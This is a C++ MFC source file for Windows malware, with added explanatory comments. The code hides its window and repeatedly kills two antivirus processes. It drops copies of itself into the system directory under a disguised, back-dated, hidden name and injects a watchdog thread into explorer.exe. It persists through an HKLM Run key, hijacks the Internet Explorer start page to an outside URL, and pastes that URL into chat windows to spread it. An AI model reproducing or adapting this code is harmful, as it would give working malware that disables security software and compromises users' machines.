// boboDlg.cpp : implementation file
//
#define UNICODE
#define _UNICODE
#include <windows.h>
#include <tchar.h>
#include <conio.h>
#include <stdio.h>
#include "stdafx.h"
#include "bobo.h"
#include "boboDlg.h"
#include "atlbase.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
// Forward declarations and process-wide state shared by the handlers below.
// Enables SeDebugPrivilege in the current process token (defined near the end of this file).
void EnableDebugPriv();
// Copies ThreadProc into explorer.exe and starts it there; returns the remote thread handle or 0.
HANDLE CreateRemote(PTSTR ctname,PTSTR ckname);
// Local watchdog thread: keeps the HKLM Run value present and re-injects when the remote thread exits.
DWORD WINAPI watch(LPVOID pvparam);
// File names appended to the system directory (see OnInitDialog and watch). In this copy every
// backslash in the file shows up as '/' (also in "/n" and "/0"), so these presumably read
// "\\bobo.exe" and "\\kernel.dll" in the original -- NOTE(review): confirm against the source.
TCHAR *name1=_T("//bobo.exe");
TCHAR *name2=_T("//kernel.dll");
// URL written as the IE start page in Creg() and pasted into chat windows by PasteText().
// PasteText() declares a local of the same name, so this global is shadowed there.
// A narrow literal initialising a TCHAR array does not compile with UNICODE defined above,
// so the project is presumably built MBCS despite those defines -- confirm.
TCHAR g_str[] = "http://lovef2.x-8.org/hy/";
// Receives the remote thread id (lpThreadId out-parameter of CreateRemoteThread) in CreateRemote.
DWORD byte_write;
// Defined elsewhere: call sites pass an image name and feed the result to OpenProcess as a PID.
DWORD GetID(char *szName);
// k: nonzero while the Ctrl+Enter hotkey (id 0) is registered; see OnTimer and OnHotKey.
int k=0;
// jj: counter incremented on every WM_TIMER tick; see OnTimer.
int jj=0;
// CAboutDlg dialog used for the application's "About" menu item
// Wizard-generated MFC About box; it carries no application logic.
class CAboutDlg : public CDialog
{
public:
CAboutDlg();
// Dialog data
enum { IDD = IDD_ABOUTBOX };
protected:
virtual void DoDataExchange(CDataExchange* pDX); // DDX/DDV support
// Implementation
protected:
DECLARE_MESSAGE_MAP()
};
// Constructs the About box from its dialog template (IDD_ABOUTBOX).
CAboutDlg::CAboutDlg() : CDialog(CAboutDlg::IDD)
{
}
// No controls are bound; only the base-class exchange runs.
void CAboutDlg::DoDataExchange(CDataExchange* pDX)
{
CDialog::DoDataExchange(pDX);
}
// Empty message map: the About box handles nothing beyond CDialog defaults.
BEGIN_MESSAGE_MAP(CAboutDlg, CDialog)
END_MESSAGE_MAP()
// CboboDlg dialog
// Constructs the main dialog and loads the application icon used by OnPaint/OnQueryDragIcon.
CboboDlg::CboboDlg(CWnd* pParent /*=NULL*/)
: CDialog(CboboDlg::IDD, pParent)
{
m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
}
// No controls are bound; only the base-class exchange runs.
void CboboDlg::DoDataExchange(CDataExchange* pDX)
{
CDialog::DoDataExchange(pDX);
}
// Message map. Beyond the wizard entries, ON_WM_TIMER routes the 30-second timer set in
// OnInitDialog to OnTimer, and ON_MESSAGE(WM_HOTKEY) routes the Ctrl+Enter hotkey registered
// there to OnHotKey.
BEGIN_MESSAGE_MAP(CboboDlg, CDialog)
ON_WM_SYSCOMMAND()
ON_WM_PAINT()
ON_WM_QUERYDRAGICON()
ON_WM_TIMER()
ON_MESSAGE(WM_HOTKEY,OnHotKey)
//}}AFX_MSG_MAP
END_MESSAGE_MAP()
// CboboDlg message handlers
// Dialog initialisation. Apart from the wizard boilerplate at the end this is the
// install routine: it terminates two security-product processes, drops copies of the
// running executable into the system directory, injects a watchdog thread into
// explorer.exe and starts a local watchdog thread.
//
// Returns TRUE normally. The -1 early returns below are non-zero and are therefore also
// read as TRUE by MFC, so a failed install still leaves the dialog (and timer) running.
// The local `ret` is declared but never used.
BOOL CboboDlg::OnInitDialog()
{
CDialog::OnInitDialog();
// Acquire SeDebugPrivilege so the PROCESS_ALL_ACCESS opens below succeed on processes of other accounts.
EnableDebugPriv();
HANDLE han11,han22;
// By their names these are the resident monitors of the Rising (RavMon) and Kingsoft (KAVStart)
// antivirus products; both are opened and killed outright. Neither handle is ever closed.
han11=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,::GetID("RavMon.exe"));
han22=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,::GetID("KAVStart.exe"));
if(han11!=NULL)
{
::TerminateProcess(han11,0);
}
if(han22!=NULL)
{
::TerminateProcess(han22,0);
}
// Timer id 0 every 30 s; handled in OnTimer (repeats the kill and registers the hotkey).
SetTimer(0,30000,NULL);
int ret;
WIN32_FIND_DATA fdata;
HANDLE ffhandle;
HANDLE fchandle;
SYSTEMTIME stime;
FILETIME ftime;
TCHAR curname[MAX_PATH];
TCHAR ctname[MAX_PATH];
TCHAR ckname[MAX_PATH];
TCHAR syspath[MAX_PATH];
// Drop targets: <system dir> + name1 (bobo.exe) and <system dir> + name2 (kernel.dll).
// The GetSystemDirectory return value is not checked here (it is in watch()).
GetSystemDirectory(syspath,MAX_PATH);
_tcscpy(ctname,syspath);
_tcscat(ctname,name1);
_tcscpy(ckname,syspath);
_tcscat(ckname,name2);
HINSTANCE hhb;
// GetWindowLong with a NULL window fails and returns 0, so hhb is NULL and
// GetModuleFileName(NULL, ...) yields the path of the running executable --
// apparently the intended result, reached by accident.
hhb=(HINSTANCE)::GetWindowLong(NULL,DWL_USER);
::GetModuleFileName(hhb,curname,MAX_PATH);
// First drop: self -> <system dir>\bobo.exe, only if absent (bFailIfExists = TRUE).
ffhandle=FindFirstFile(ctname,&fdata);
if(ffhandle==INVALID_HANDLE_VALUE)
{
if(!CopyFile(curname,ctname,TRUE))
{
return -1;
}
}
else if(!FindClose(ffhandle))
{
return -1;
}
// Second drop: self -> <system dir>\kernel.dll (a system-looking name), only when the
// lookup failed with ERROR_FILE_NOT_FOUND (2).
ffhandle=FindFirstFile(ckname,&fdata);
if(ffhandle==INVALID_HANDLE_VALUE)
{
if(GetLastError()==2)
{
if(!CopyFile(curname,ckname,TRUE))
{
return -1;
}
fchandle=CreateFile(ckname,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);
if(fchandle==INVALID_HANDLE_VALUE)
{
return -1;
}
// Timestomping: back-date the dropped file to 2002-01-12 01:00 so it does not stand
// out as newly created. Every early return between here and CloseHandle leaks fchandle.
memset(&stime,0,sizeof(stime));
stime.wYear=2002;
stime.wMonth=1;
stime.wDay=12;
stime.wDayOfWeek=5;
stime.wHour=1;
if(!SystemTimeToFileTime(&stime,&ftime))
{
return -1;
}
// Arguments: creation time, last-access time (NULL = unchanged), last-write time.
if(!SetFileTime(fchandle,&ftime,NULL,&ftime))
{
return -1;
}
// Read-only + hidden + system keeps the copy out of a default Explorer listing.
if(!SetFileAttributes(ckname,
FILE_ATTRIBUTE_READONLY |
FILE_ATTRIBUTE_HIDDEN |
FILE_ATTRIBUTE_SYSTEM ))
{
return -1;
}
CloseHandle(fchandle);
}
else
{
return -1;
}
}
else if(!FindClose(ffhandle))
{
return -1;
}
HANDLE hthread,wthread;
// Inject ThreadProc into explorer.exe (see CreateRemote). The remote thread handle is
// handed to the local watch thread, which re-injects if it ever exits. wthread is never
// closed or joined.
hthread=CreateRemote(ctname,ckname);
wthread=CreateThread(NULL,0,watch,(LPVOID)hthread,0,NULL);
// Add the "About..." menu item to the system menu.
// IDM_ABOUTBOX must be in the system command range.
ASSERT((IDM_ABOUTBOX & 0xFFF0) == IDM_ABOUTBOX);
ASSERT(IDM_ABOUTBOX < 0xF000);
CMenu* pSysMenu = GetSystemMenu(FALSE);
if (pSysMenu != NULL)
{
CString strAboutMenu;
strAboutMenu.LoadString(IDS_ABOUTBOX);
if (!strAboutMenu.IsEmpty())
{
pSysMenu->AppendMenu(MF_SEPARATOR);
pSysMenu->AppendMenu(MF_STRING, IDM_ABOUTBOX, strAboutMenu);
}
}
// Set the icon for this dialog. The framework does this automatically
// when the application's main window is not a dialog.
SetIcon(m_hIcon, TRUE); // Set big icon
SetIcon(m_hIcon, FALSE); // Set small icon
// TODO: Add extra initialization here
return TRUE; // return TRUE unless you set the focus to a control
}
// Shows the About box for the IDM_ABOUTBOX system-menu command; everything else goes to CDialog.
void CboboDlg::OnSysCommand(UINT nID, LPARAM lParam)
{
if ((nID & 0xFFF0) == IDM_ABOUTBOX)
{
CAboutDlg dlgAbout;
dlgAbout.DoModal();
}
else
{
CDialog::OnSysCommand(nID, lParam);
}
}
// If you add a minimize button to your dialog, you will need the code below
// to draw the icon. For MFC applications using the document/view model,
// this is automatically done for you by the framework.
// Wizard-generated paint handler: draws the application icon centred in the client
// area when the dialog is minimised, otherwise defers to CDialog.
void CboboDlg::OnPaint()
{
if (IsIconic())
{
CPaintDC dc(this); // device context for painting
SendMessage(WM_ICONERASEBKGND, reinterpret_cast<WPARAM>(dc.GetSafeHdc()), 0);
// Center icon in client rectangle
int cxIcon = GetSystemMetrics(SM_CXICON);
int cyIcon = GetSystemMetrics(SM_CYICON);
CRect rect;
GetClientRect(&rect);
int x = (rect.Width() - cxIcon + 1) / 2;
int y = (rect.Height() - cyIcon + 1) / 2;
// Draw the icon
dc.DrawIcon(x, y, m_hIcon);
}
else
{
CDialog::OnPaint();
}
}
// Intercepts WM_NCPAINT (0x85 == 133) and hides the window the moment its frame
// would be drawn, so the dialog never becomes visible to the user.
LRESULT CboboDlg::DefWindowProc(UINT message, WPARAM wParam, LPARAM lParam)
{
if(message==133)
{
ShowWindow(SW_HIDE);
}
return CDialog::DefWindowProc(message, wParam, lParam);
}
// The system calls this function to obtain the cursor to display while the user drags the minimized window.
// Returns the application icon as the drag cursor.
HCURSOR CboboDlg::OnQueryDragIcon()
{
return static_cast<HCURSOR>(m_hIcon);
}
// Parameter block that CreateRemote copies verbatim into the target process and passes
// to ThreadProc as its argument. The injected code cannot reference anything from this
// module, so every API it needs is passed as a raw address and every string as an inline
// buffer.
typedef struct _RemotePara{// parameter block
// "hello" string and the MessageBoxA address: filled in by CreateRemote, never used by ThreadProc.
char pMessageBox[12];
DWORD dwMessageBox;
// kernel32 export addresses resolved in the injecting process; they are only meaningful in
// the target if kernel32.dll is mapped at the same base there.
DWORD rpoutputdebugstring;
DWORD rpopenprocess;
DWORD rpwaitforsingleobject;
DWORD rpfindfirstfile;
DWORD rpcopyfile;
DWORD rpfindclose;
DWORD rpwinexec;
// PID of the injecting process (set from GetCurrentProcessId); ThreadProc waits for it to exit.
DWORD rpmousepid;
// Scratch handles used inside ThreadProc.
HANDLE rpprocesshandle;
HANDLE rpfilehandle;
// rptname: <system dir>\bobo.exe (the file to relaunch); rpkname: <system dir>\kernel.dll (the backup copy).
TCHAR rptname[MAX_PATH];
TCHAR rpkname[MAX_PATH];
// ANSI copy of rptname written by WideCharToMultiByte in CreateRemote; ThreadProc does not use it.
char rpwinexecname[MAX_PATH];
WIN32_FIND_DATA rpfdata;
// Debug-output strings; only rpstring and rpwfsosignal are actually emitted by ThreadProc.
TCHAR rpoperror[30];
TCHAR rpffferror[30];
TCHAR rpcferror[30];
TCHAR rpfcerror[30];
TCHAR rpweerror[30];
TCHAR rpstring[30];
TCHAR rpwfsosignal[30];
}RemotePara, *PREMOTEPARAMETER;
// Remote thread
// Body of the thread that CreateRemote copies into explorer.exe. It has to be
// self-contained: every API is reached through an address in *pvparam and no literal
// strings or CRT calls appear here. It acts as a watchdog for the injecting process:
// wait for that process (rpmousepid) to exit, then make sure <system dir>\bobo.exe
// exists (restoring it from kernel.dll if needed) and run it again.
//
// Returns 0 on success, (DWORD)-1 on any failure. The process handle opened here is never closed.
DWORD __stdcall ThreadProc (LPVOID pvparam)
{
PREMOTEPARAMETER erp=(PREMOTEPARAMETER)pvparam;
typedef int (__stdcall *MMessageBoxA)(HWND,LPCTSTR,LPCTSTR,DWORD);// MessageBox function type
MMessageBoxA myMessageBoxA;
myMessageBoxA =(MMessageBoxA) erp->dwMessageBox ;// function entry address (assigned but never called)
typedef VOID (__stdcall *EOutputDebugString)(LPCTSTR);
typedef HANDLE (__stdcall *EOpenProcess)(DWORD, BOOL, DWORD);
typedef DWORD (__stdcall *EWaitForSingleObject)(HANDLE, DWORD);
typedef HANDLE (__stdcall *EFindFirstFile)(LPCTSTR, LPWIN32_FIND_DATA);
typedef BOOL (__stdcall *ECopyFile)(LPCTSTR, LPCTSTR, BOOL);
typedef BOOL (__stdcall *EFindClose)(HANDLE);
typedef UINT (__stdcall *EWinExec)(LPCSTR, UINT);
EOutputDebugString tOutputDebugString;
EOpenProcess tOpenProcess;
EWaitForSingleObject tWaitForSingleObject;
EFindFirstFile tFindFirstFile;
ECopyFile tCopyFile;
EFindClose tFindClose;
EWinExec tWinExec;
// Rebuild callable function pointers from the addresses supplied by CreateRemote.
tOutputDebugString=(EOutputDebugString)erp->rpoutputdebugstring;
tOpenProcess=(EOpenProcess)erp->rpopenprocess;
tWaitForSingleObject=(EWaitForSingleObject)erp->rpwaitforsingleobject;
tFindFirstFile=(EFindFirstFile)erp->rpfindfirstfile;
tCopyFile=(ECopyFile)erp->rpcopyfile;
tFindClose=(EFindClose)erp->rpfindclose;
tWinExec=(EWinExec)erp->rpwinexec;
// Debugger-visible marker (resolved as OutputDebugStringW in CreateRemote).
tOutputDebugString(erp->rpstring);
// Block until the injecting process terminates.
erp->rpprocesshandle=tOpenProcess(PROCESS_ALL_ACCESS,FALSE,erp->rpmousepid);
if(erp->rpprocesshandle==NULL)
{
return -1;
}
tWaitForSingleObject(erp->rpprocesshandle,INFINITE);
tOutputDebugString(erp->rpwfsosignal);
// rpfindfirstfile/rpcopyfile are resolved as the ...A entry points in CreateRemote while
// rptname/rpkname are TCHAR buffers -- consistent only for an MBCS build.
erp->rpfilehandle=(HANDLE)tFindFirstFile(erp->rptname,&erp->rpfdata);
if(erp->rpfilehandle==INVALID_HANDLE_VALUE)
{
// Restore bobo.exe from the hidden kernel.dll copy.
if(!tCopyFile(erp->rpkname,erp->rptname,TRUE))
{
return -1;
}
}
// Also reached after the copy above, where rpfilehandle is still INVALID_HANDLE_VALUE,
// so that path returns -1 here without reaching WinExec.
if(!tFindClose(erp->rpfilehandle))
{
return -1;
}
// Relaunch with uCmdShow 0 (SW_HIDE); WinExec reports failure with a value below 32.
if((tWinExec(erp->rptname, 0))<32)
{
return -1;
}
return 0;
}
// Local watchdog thread started from OnInitDialog with the remote thread handle as its
// argument. Once a second it (1) ensures the HKLM ...\CurrentVersion\Run value "bobo"
// exists and points at <system dir>\bobo.exe, and (2) re-injects explorer.exe if the
// remote thread has exited. The loop only ends when a registry call fails.
//
// Returns 0 when the loop is left, (DWORD)-1 if the system directory lookup fails.
DWORD WINAPI watch(LPVOID pvparam)
{
HANDLE wethread=(HANDLE)pvparam;
DWORD exitcode;
HKEY hkey;
TCHAR sname[MAX_PATH];
TCHAR wtname[MAX_PATH];
TCHAR wkname[MAX_PATH];
TCHAR lpdata[MAX_PATH];
// Run key used for persistence (separators appear as "//" in this copy; see the note at name1).
LPCTSTR rgspath=_T("Software//Microsoft//Windows//CurrentVersion//Run");
DWORD type=REG_SZ;
// In/out size for RegQueryValueEx. It is never reset to MAX_PATH between iterations and
// is reused as the byte count for RegSetValueEx below.
DWORD dwbuflen=MAX_PATH;
int ret;
if((ret=GetSystemDirectory(sname,MAX_PATH))==0)
{
// There is no console in this GUI application for _tprintf to write to.
_tprintf(_T("GetSystemDirectory in watch Error: %d/n"),GetLastError());
return -1;
}
// Same two paths as in OnInitDialog: <system dir>\bobo.exe and <system dir>\kernel.dll.
_tcscpy(wtname,sname);
_tcscat(wtname,name1);
_tcscpy(wkname,sname);
_tcscat(wkname,name2);
while(1)
{
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,rgspath,0,KEY_QUERY_VALUE,&hkey);
if(ret!=ERROR_SUCCESS)
{
break;
}
// Persistence check: is the "bobo" Run value still present?
ret=RegQueryValueEx(hkey,_T("bobo"),NULL,NULL,(LPBYTE)lpdata,&dwbuflen);
RegCloseKey(hkey);
if(ret!=ERROR_SUCCESS)
{
ret=RegOpenKeyEx(HKEY_LOCAL_MACHINE,rgspath,0,KEY_WRITE,&hkey);
if(ret!=ERROR_SUCCESS)
{
break;
}
// Re-create it. dwbuflen bytes of wtname are written rather than the string's own
// length, so the stored value may carry uninitialised stack bytes past the terminator.
ret=RegSetValueEx(hkey,_T("bobo"),NULL,type,(const byte *)wtname,dwbuflen);
RegCloseKey(hkey);
if(ret!=ERROR_SUCCESS)
{
break;
}
}
// Re-inject when the remote thread is gone; the previous handle is not closed.
GetExitCodeThread(wethread,&exitcode);
if(exitcode!=STILL_ACTIVE)
{
wethread=CreateRemote(wtname,wkname);
}
Sleep(1000);
}
return 0;
}
// Injects ThreadProc plus a RemotePara block into explorer.exe and starts it as a remote
// thread: OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx(RWX) -> WriteProcessMemory ->
// CreateRemoteThread, the sequence that endpoint telemetry flags as code injection.
//
// ctname/ckname: full paths of <system dir>\bobo.exe and <system dir>\kernel.dll.
// Returns the remote thread handle, or 0 on failure. The process handle (misnamed hWnd)
// and the two LoadLibrary references are never released.
HANDLE CreateRemote(PTSTR ctname,PTSTR ckname)
{
const DWORD THREADSIZE=1024*4;
HANDLE hWnd = ::OpenProcess (PROCESS_ALL_ACCESS,FALSE,::GetID("explorer.exe"));
if(!hWnd)return 0;
// 4 KiB of RWX memory in the target; the raw bytes starting at &ThreadProc are copied
// there. This assumes ThreadProc is under 4 KiB and position independent, and the copy
// reads past its end into whatever follows in this module. In an incrementally linked
// debug build &ThreadProc may be a jump thunk rather than the body -- confirm.
void *pRemoteThread =::VirtualAllocEx(hWnd,0,THREADSIZE,MEM_COMMIT| MEM_RESERVE,PAGE_EXECUTE_READWRITE);
if(!pRemoteThread)
{
MessageBox(NULL,"1","1",0);
return 0;
}
// A failed write only shows a message box; execution continues regardless.
if(!::WriteProcessMemory(hWnd,pRemoteThread,&ThreadProc,THREADSIZE,0))
{
MessageBox(NULL,"21","21",0);
}
// Fill in the parameter block.
RemotePara rp;
::ZeroMemory(&rp,sizeof(rp));
HINSTANCE hUser32 = ::LoadLibrary ("user32.dll");
HINSTANCE hkernel32=::LoadLibrary("kernel32.dll");
{ const DWORD THREADSIZE=1024*4;// unused; shadows the outer constant
rp.dwMessageBox =(DWORD) ::GetProcAddress (hUser32 , "MessageBoxA");
strcpy(rp.pMessageBox,"hello/0");
// The remote thread waits for this (the current) process to exit before acting.
rp.rpmousepid=GetCurrentProcessId();
_tcscpy(rp.rpstring,_T("i am in remote process/n"));
_tcscpy(rp.rpcferror,_T("CopyFile Error/n"));
_tcscpy(rp.rpfcerror,_T("FindClose Error/n"));
_tcscpy(rp.rpffferror,_T("FindFirstFile Error/n"));
_tcscpy(rp.rpoperror,_T("OpenProcess Error/n"));
_tcscpy(rp.rpweerror,_T("WinExec Error/n"));
_tcscpy(rp.rpwfsosignal,_T("i am out of remote process/n"));
_tcscpy(rp.rptname,ctname);
_tcscpy(rp.rpkname,ckname);
// ctname is cast to a wide string regardless of the build's character set, and the output
// size leaves no room for the terminator that the -1 input length includes, so this
// conversion presumably fails and rpwinexecname stays zeroed; ThreadProc does not use it.
WideCharToMultiByte(CP_ACP,0,(LPCWSTR)ctname,-1,rp.rpwinexecname,_tcslen(ctname),NULL,NULL);
// Export addresses taken from this process; valid in explorer.exe only if kernel32.dll is
// mapped at the same base there. Note the A-suffixed variants paired with TCHAR buffers
// (see ThreadProc).
rp.rpoutputdebugstring=(DWORD)GetProcAddress(hkernel32,"OutputDebugStringW");
rp.rpopenprocess=(DWORD)GetProcAddress(hkernel32,"OpenProcess");
rp.rpwaitforsingleobject=(DWORD)GetProcAddress(hkernel32,"WaitForSingleObject");
rp.rpfindfirstfile=(DWORD)GetProcAddress(hkernel32,"FindFirstFileA");
rp.rpcopyfile=(DWORD)GetProcAddress(hkernel32,"CopyFileA");
rp.rpfindclose=(DWORD)GetProcAddress(hkernel32,"FindClose");
rp.rpwinexec=(DWORD)GetProcAddress(hkernel32,"WinExec");
}
// Write the block into the target process.
RemotePara *pRemotePara =(RemotePara *) ::VirtualAllocEx (hWnd ,0,sizeof(RemotePara),MEM_COMMIT,PAGE_READWRITE);// note the page protection requested here
if(!pRemotePara)
return 0;
if(!::WriteProcessMemory (hWnd,pRemotePara,&rp,sizeof(rp),0))
{::MessageBox(NULL,"a","b",0);
return 0;
}
// Start the thread; the global byte_write receives the new thread's id.
HANDLE hThread = ::CreateRemoteThread(hWnd,0,0,(DWORD(__stdcall *)(void *))pRemoteThread ,pRemotePara,0,&byte_write);
if(!hThread)
{
::MessageBox(NULL,"a","a",0);
return 0;
}
return hThread;
}
// Elevate privileges
// Enables SeDebugPrivilege in the current process token so that the PROCESS_ALL_ACCESS
// opens elsewhere in this file succeed on processes owned by other accounts. Failures are
// silent. Note the inverted cleanup: hToken is closed only when AdjustTokenPrivileges
// fails and leaks on success; the ERROR_NOT_ALL_ASSIGNED case is also not checked.
void EnableDebugPriv( void )
{
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;
if ( ! OpenProcessToken( GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
return;
if ( ! LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sedebugnameValue ) ){
CloseHandle( hToken );
return;
}
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if ( ! AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL ) )
CloseHandle( hToken );
}
// Places the URL on the clipboard as CF_TEXT and synthesises Ctrl+V so the foreground
// window (a chat window, see OnHotKey) receives it as typed input.
// Key codes: 0x11 = VK_CONTROL, 0x56 = 'V'.
void PasteText()
{
// Local copy that shadows the file-level g_str; same narrow-literal/TCHAR caveat as there.
TCHAR g_str[] = "http://lovef2.x-8.org/hy/";
HGLOBAL hMem;
LPTSTR pStr;
// Allocate the clipboard buffer
hMem = GlobalAlloc(GMEM_SHARE, sizeof(g_str));
pStr = (LPSTR)GlobalLock(hMem);
lstrcpy(pStr, g_str);
GlobalUnlock(hMem);
// Return values of OpenClipboard/SetClipboardData are not checked.
OpenClipboard(NULL);
EmptyClipboard();
// Set the clipboard text
SetClipboardData(CF_TEXT, hMem);
CloseClipboard();
// Once SetClipboardData succeeds the clipboard owns hMem, so freeing it here releases memory
// the system still references.
GlobalFree(hMem);
// Ctrl down, V down, V up, Ctrl up.
::keybd_event(0x11,0,0,0);
::keybd_event(0x56,0,0,0);
::keybd_event(0x56,0,KEYEVENTF_KEYUP,0);
::keybd_event(0x11,0,KEYEVENTF_KEYUP,0);
Sleep(500);
}
// WM_HOTKEY handler for hotkey id 0 (Ctrl+Enter, registered in OnTimer). Reads the
// foreground window's title; if it matches, pastes the URL into that window. In both
// branches the hotkey is then unregistered (k = 0) and Ctrl+Enter is replayed so the
// keystroke the user pressed still reaches the application. Many chat clients use
// Ctrl+Enter to send, which would post the pasted URL to the chat -- inferred from the
// title check, not visible in this file. OnTimer re-registers the hotkey within 30 s.
//
// Returns 0 (message handled).
LONG CboboDlg::OnHotKey(WPARAM wParam,LPARAM lParam)
{
char szTitle[256];
// "聊天中" (roughly "chatting"). strpbrk matches any single byte of this set, not the
// substring, so in a multi-byte build any title sharing a byte with these characters
// also matches.
char *c="聊天中";
char *cc;
HWND hWnd=::GetForegroundWindow();
// Up to 254 characters plus terminator. The (long) cast assumes a 32-bit LPARAM.
::SendMessage(hWnd,WM_GETTEXT,255,(long)szTitle);
cc=::strpbrk(szTitle,c);
if(cc)
{
PasteText();
::UnregisterHotKey(GetSafeHwnd(),0);
k=0;
// 0x11 = VK_CONTROL, 0x0D = VK_RETURN. In the third call KEYEVENTF_KEYUP is passed in
// the bScan position rather than dwFlags, so it is a second key-down of Return.
::keybd_event(0x11,0,0,0);
::keybd_event(0x0D,0,0,0);
::keybd_event(0x0D,KEYEVENTF_KEYUP,0,0);
::keybd_event(0x11,0,KEYEVENTF_KEYUP,0);
}
else
{
// Identical to the branch above minus the paste.
::UnregisterHotKey(GetSafeHwnd(),0);
k=0;
::keybd_event(0x11,0,0,0);
::keybd_event(0x0D,0,0,0);
::keybd_event(0x0D,KEYEVENTF_KEYUP,0,0);
::keybd_event(0x11,0,KEYEVENTF_KEYUP,0);
}
return 0;
}
// Target of the first Creg() write: the per-user Internet Explorer "Control Panel" policy key
// (separators appear as "//" in this copy; see the note at name1).
HKEY str0=HKEY_CURRENT_USER;
CString str1="Software//Policies//Microsoft//Internet Explorer//Control Panel";
// Browser hijack: sets the HKCU Internet Explorer "HomePage" policy (1 = the user cannot
// change the home page), points the IE "Start Page" at the URL in both HKCU and HKLM,
// and launches Internet Explorer. CRegKey::Open does not create missing keys and no
// return code is checked, so on a machine without the policy key the first Set silently
// fails. Only reachable from OnTimer (see the note there).
void Creg()
{
CRegKey reg;
reg.Open(str0,str1,KEY_READ|KEY_WRITE);
reg.SetDWORDValue("HomePage",1);
reg.Close();
reg.Open(str0,"Software//Microsoft//Internet Explorer//Main",KEY_READ|KEY_WRITE);
reg.SetStringValue("Start Page","http://lovef2.x-8.org/hy/",REG_SZ);
reg.Close();
reg.Open(HKEY_LOCAL_MACHINE,"Software//Microsoft//Internet Explorer//Main",KEY_READ|KEY_WRITE);
reg.SetStringValue("Start Page","http://lovef2.x-8.org/hy/",REG_SZ);
reg.Close();
// nShowCmd 1 = SW_SHOWNORMAL; the path uses the same "//" separators as above.
ShellExecute(NULL,"open","C://Program Files//Internet Explorer//iexplore.exe",NULL,NULL,1);
}
// WM_TIMER handler for the 30-second timer set in OnInitDialog (nIDEvent is unused).
// Each tick: terminate the two antivirus monitors again (handles leaked, as in
// OnInitDialog) and register the Ctrl+Enter hotkey (MOD_CONTROL + 0x0D = VK_RETURN,
// id 0) if OnHotKey has released it. The Creg() branch is effectively dead: jj is
// incremented before the test, so jj == 0 only recurs after the counter wraps (signed
// overflow), and the nested jj == 6 test can never hold inside it.
void CboboDlg::OnTimer(UINT nIDEvent)
{
jj++;
HANDLE han1,han2;
han1=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,::GetID("RavMon.exe"));
han2=::OpenProcess(PROCESS_ALL_ACCESS,FALSE,::GetID("KAVStart.exe"));
if(han1!=NULL)
{
::TerminateProcess(han1,0);
}
if(han2!=NULL)
{
::TerminateProcess(han2,0);
}
// RegisterHotKey returns a BOOL, so k becomes nonzero only when registration succeeds.
if(k==0)
{
k=RegisterHotKey(GetSafeHwnd(),0,MOD_CONTROL,0x0D);
}
if(jj==0)
{
Creg();
if(jj==6)
{
jj=0;
}
}
}